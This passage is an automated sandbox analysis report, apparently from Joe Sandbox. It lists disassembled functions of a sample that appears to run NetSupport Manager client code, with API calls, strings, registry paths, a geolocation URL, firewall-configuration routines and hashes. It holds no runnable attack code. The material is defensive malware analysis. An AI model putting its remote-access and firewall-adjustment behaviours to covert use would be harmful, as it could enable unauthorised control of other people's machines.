LoadLibraryA.KERNEL32(PCIINV.DLL,F3EE1E80,03007D18,03007D08,?,00000000,1118276C,000000FF,?,11031942,03007D18,00000000,?,?,?), ref: 11085E45

Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477

Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EDC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E

GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11085E6B
GetProcAddress.KERNEL32(00000000,Cancel), ref: 11085E7F
GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11085E93
wsprintfA.USER32 ref: 11085F1B
wsprintfA.USER32 ref: 11085F32
wsprintfA.USER32 ref: 11085F49
CloseHandle.KERNEL32(00000000,11085C70,00000001,00000000), ref: 1108609A

Part of subcall function 11085A80: CloseHandle.KERNEL32(?,7591F550,?,?,110860C0,?,11031942,03007D18,00000000,?,?,?), ref: 11085A98
Part of subcall function 11085A80: CloseHandle.KERNEL32(?,7591F550,?,?,110860C0,?,11031942,03007D18,00000000,?,?,?), ref: 11085AAB
Part of subcall function 11085A80: CloseHandle.KERNEL32(?,7591F550,?,?,110860C0,?,11031942,03007D18,00000000,?,?,?), ref: 11085ABE
Part of subcall function 11085A80: FreeLibrary.KERNEL32(00000000,7591F550,?,?,110860C0,?,11031942,03007D18,00000000,?,?,?), ref: 11085AD1

Strings

%s_HW.%s, xrefs: 11085F12
GetInventoryEx, xrefs: 11085E87
GetInventory, xrefs: 11085E65
Cancel, xrefs: 11085E79
%s_SW.%s, xrefs: 11085F2C
PCIINV.DLL, xrefs: 11085E40
%s_HF.%s, xrefs: 11085F43

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
API String ID: 4263811268-2492245516
Opcode ID: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
Instruction ID: c264ff3baa83c9e34b1ea5f373b83d9ca187d225ad452563e08076ac2ec7b834
Opcode Fuzzy Hash: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
Instruction Fuzzy Hash: 40718175E0874AABEB14CF75CC46BDBFBE4AB48304F10452AE956D7280EB71A500CB95

Function 110304B8 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 190synchronizationlibraryloaderCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 110305F3
CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 1103060A
GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 110306AC
SetLastError.KERNEL32(00000078), ref: 110306C2
WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
CloseHandle.KERNEL32(?), ref: 11030709
FreeLibrary.KERNEL32(?), ref: 11030714
CloseHandle.KERNEL32(00000000), ref: 1103071B

Strings

/247, xrefs: 11030616
istaUI, xrefs: 1103050D
SetProcessDPIAware, xrefs: 110306A6
_debug\trace, xrefs: 11030544
SOFTWARE\Policies\NetSupport\Client\standard, xrefs: 1103052A
_debug\tracefile, xrefs: 11030556
PCIMutex, xrefs: 110305E3, 11030603

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
API String ID: 2061479752-1320826866
Opcode ID: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
Instruction ID: 4511418fabb8e143c6e2e60e2068ec6a59f08b67eb8208c825473cc9362a61df
Opcode Fuzzy Hash: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
Instruction Fuzzy Hash: 72613774E1635AAFEB10DFB09C44B9EB7B4AF8470DF1000A9D919A71C5EF70AA44CB51

Function 1102C410 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C455
GetTickCount.KERNEL32 ref: 1102C47A

Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A

GetTickCount.KERNEL32 ref: 1102C574

Part of subcall function 110D1370: wvsprintfA.USER32(?,?,1102C511), ref: 110D139B

Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C66C
CloseHandle.KERNEL32(?), ref: 1102C688

Strings

GeoIP, xrefs: 1102C4C3
GetLatLong=%s, took %d ms, xrefs: 1102C591
?IP=%s, xrefs: 1102C506
IsA(), xrefs: 1102C6BE, 1102C6D2, 1102C6E6, 1102C6FA
LatLong, xrefs: 1102C438, 1102C525
_debug, xrefs: 1102C4C8, 1102C52A
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102C6B9, 1102C6CD, 1102C6E1, 1102C6F5
http://geo.netsupportsoftware.com/location/loca.asp, xrefs: 1102C495

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
API String ID: 596640303-1725438197
Opcode ID: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
Instruction ID: 59613557395ae23f7967247d4baf4cae7550bfc3229e85cd4bc92fe2e2f2b4a8
Opcode Fuzzy Hash: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
Instruction Fuzzy Hash: 6B818275E0020AABDF04DBE8CD94FEEF7B5AF59708F504258E82567284DB34BA05CB61

Function 11061700 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106175A

Part of subcall function 11061140: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
Part of subcall function 11061140: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4

RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110617AB
RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11061865
RegCloseKey.ADVAPI32(?), ref: 11061881

Strings

Software\Policies\NetSupport\Client, xrefs: 11061754
Client.%04d.%s, xrefs: 110617E7
Client, xrefs: 110617FA
Software\Policies\NetSupport, xrefs: 110617FF
%s\%s\%s\, xrefs: 11061804
Standard, xrefs: 110617C6
Software\Policies\NetSupport\Client\Standard, xrefs: 1106176D
DisableUserPolicies, xrefs: 11061893
Client, xrefs: 11061768, 11061898

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Enum$Open$CloseValue
String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
API String ID: 2823542970-1528906934
Opcode ID: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
Instruction ID: 3a074a016260bf88f68c0586b8c591cabbb012c9b5ad66670ab8b6bf40d046b4
Opcode Fuzzy Hash: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
Instruction Fuzzy Hash: 5F416179E4022DABD724CB55CC81FEAB7BCEB94748F1001D9EA48A6140D6B06E84CFA1

Function 11137630 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON

Download Yara Rule

APIs

Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D

GetTickCount.KERNEL32 ref: 11137692

Part of subcall function 11096970: CoInitialize.OLE32(00000000), ref: 11096984
Part of subcall function 11096970: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
Part of subcall function 11096970: CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
Part of subcall function 11096970: CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9

GetTickCount.KERNEL32 ref: 111376A1
_memset.LIBCMT ref: 111376E3
GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 111376F9
_strrchr.LIBCMT ref: 11137708
_free.LIBCMT ref: 1113775A

Strings

IsICFPresent..., xrefs: 1113767F
No ICF present, xrefs: 11137792
ICFConfig, xrefs: 11137645
ICFConfig2 returned 0x%x, xrefs: 11137760
IsICFPresent() took %d ms, xrefs: 111376AD
*AutoICFConfig, xrefs: 11137667
Client, xrefs: 1113766C

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
API String ID: 711243594-1270230032
Opcode ID: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
Instruction ID: 94b21c48fabd249aebac1ca0d473d12a11480cc4bb4ab1ee9f0f9b3b40903c19
Opcode Fuzzy Hash: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
Instruction Fuzzy Hash: 9941AE7AE0022E97C710DF756C89BEFF7699B5471DF040079E90493140EAB1AD44CBE1

Function 6C5D7610 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 111networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WSOCK32 ref: 6C5D7642
connect.WSOCK32(00000000,?,?), ref: 6C5D7659
WSAGetLastError.WSOCK32(00000000,?,?), ref: 6C5D7660
_memmove.LIBCMT ref: 6C5D76D3
select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6C5D76F3
GetTickCount.KERNEL32 ref: 6C5D7717
ioctlsocket.WSOCK32 ref: 6C5D775C
SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5D7762
WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6C5D777A
__WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6C5D778B

Strings

*BlockingIO, xrefs: 6C5D7732
General, xrefs: 6C5D7683
ConnectTimeout, xrefs: 6C5D767E

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
String ID: *BlockingIO$ConnectTimeout$General
API String ID: 4218156244-2969206566
Opcode ID: ce216dd1b8016a28e30687b62eeb501ad2fd43b4a61ae7b04e5e5c1d2e8c6ab6
Instruction ID: c61fb15bd987e2e7e68fd7515e20124b0a7e663a183b22da689ba305607cbf09
Opcode Fuzzy Hash: ce216dd1b8016a28e30687b62eeb501ad2fd43b4a61ae7b04e5e5c1d2e8c6ab6
Instruction Fuzzy Hash: A4414D71900314DBE720DB68CC48BDE73BAEF84305F41449AE51993A41EB70AE49CFA9

Function 11133E80 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA

AdjustWindowRectEx.USER32(111417B8,00CE0000,00000001,00000001), ref: 11133EC7
LoadMenuA.USER32(00000000,000003EC), ref: 11133ED8
GetSystemMetrics.USER32(00000021), ref: 11133EE9
GetSystemMetrics.USER32(0000000F), ref: 11133EF1
GetSystemMetrics.USER32(00000004), ref: 11133EF7
GetDC.USER32(00000000), ref: 11133F03
GetDeviceCaps.GDI32(00000000,0000005A), ref: 11133F0E
ReleaseDC.USER32(00000000,00000000), ref: 11133F1A
CreateWindowExA.USER32(00000001,NSMWClass,013FE048,00CE0000,80000000,80000000,111417B8,?,00000000,?,11000000,00000000), ref: 11133F6F
GetLastError.KERNEL32(?,?,?,?,?,110F7D09,00000001,111417B8,_debug), ref: 11133F77

Strings

NSMWClass, xrefs: 11133F69
mainwnd ht1=%d, ht2=%d, yppi=%d, xrefs: 11133F2E
CreateMainWnd, hwnd=%x, e=%d, xrefs: 11133F7F

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
API String ID: 1594747848-1114959992
Opcode ID: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
Instruction ID: 5297cf036ba1cbd73fc44df567c8a611b910eb11675e7325f2afb4d5e36916b9
Opcode Fuzzy Hash: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
Instruction Fuzzy Hash: C4316275E10219ABDB149FF58C85FAFFBB8EB48709F100529FA25B7284D67469008BA4

Function 1102CC10 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 284servicesleepCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102DD98,00000000,F3EE1E80,?,00000000,00000000), ref: 1102CE44
OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CE5A
QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CE6E
CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE75
Sleep.KERNEL32(00000032), ref: 1102CE86
CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE96
Sleep.KERNEL32(000003E8), ref: 1102CEE2
CloseHandle.KERNEL32(?), ref: 1102CF0F

Strings

ProtectedStorage, xrefs: 1102CE54
NSM.LIC, xrefs: 1102CF47
NSA.LIC, xrefs: 1102CF56, 1102CF5D, 1102CF8D
>, xrefs: 1102CDBB

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
API String ID: 83693535-2077998243
Opcode ID: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
Instruction ID: 880dc79335238c7f7dd8ff78cda89552a6d5dde84d0873ba54ec41c4173cff75
Opcode Fuzzy Hash: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
Instruction Fuzzy Hash: 27B19475E012259FDB25DFA4CD80BEDB7B5BB48708F5041E9E919AB381DB70AA80CF50

Function 11132BF0 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 107COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11132C60
GetTickCount.KERNEL32 ref: 11132C91
SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
GetTickCount.KERNEL32 ref: 11132CAC

Strings

runplugin.exe, xrefs: 11132C3E
%s%s, xrefs: 11132C5A, 11132CFE
CommonPath, xrefs: 11132CCF
Software\NSL, xrefs: 11132CD4
Warning. SHGetFolderPath took %d ms, xrefs: 11132CB6
HasStudentComponents=%d, xrefs: 11132D27
schplayer.exe, xrefs: 11132CE8

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CountTick$FolderPathwsprintf
String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
API String ID: 1170620360-4157686185
Opcode ID: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
Instruction ID: 1138b9c1199a8041912b1953dd267279d987a2a799c8ea79b9a25deb6d60bab0
Opcode Fuzzy Hash: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
Instruction Fuzzy Hash: F33157BAE4022E67E700AFB0AC84FEDF36C9B9471EF1000A9E915A7145EA72B545C761

Function 111450A0 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetVersionExA.KERNEL32(111F0EF0,75A78400), ref: 111450D0
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
